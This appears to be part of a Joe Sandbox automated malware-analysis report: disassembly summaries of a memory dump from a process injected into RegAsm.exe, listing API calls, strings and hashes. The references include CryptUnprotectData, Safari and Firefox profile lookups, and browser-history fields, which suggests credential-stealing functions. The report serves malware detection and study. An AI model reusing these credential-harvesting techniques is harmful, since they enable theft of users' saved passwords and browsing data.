                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3604893535-0
                                                                                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                          APIs
                                                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1213725291-0
                                                                                                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                          • free.MSVCRT ref: 00418370
                                                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                          • String ID: OsError 0x%x (%u)
                                                                                                                          • API String ID: 2360000266-2664311388
                                                                                                                          • Opcode ID: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                          • Opcode Fuzzy Hash: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                          APIs
                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Version
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1889659487-0
                                                                                                                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                          APIs
                                                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                                                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                          • API String ID: 2257402768-1134094380
                                                                                                                          • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                          • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                                                          • API String ID: 2787044678-1921111777
                                                                                                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                          • API String ID: 2080319088-3046471546
                                                                                                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                          APIs
                                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                          Strings
                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                          • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 829165378-0
                                                                                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                          • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1043902810-0
                                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                          • free.MSVCRT ref: 0040E49A
                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                          • API String ID: 3849927982-2252543386
                                                                                                                          • Opcode ID: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
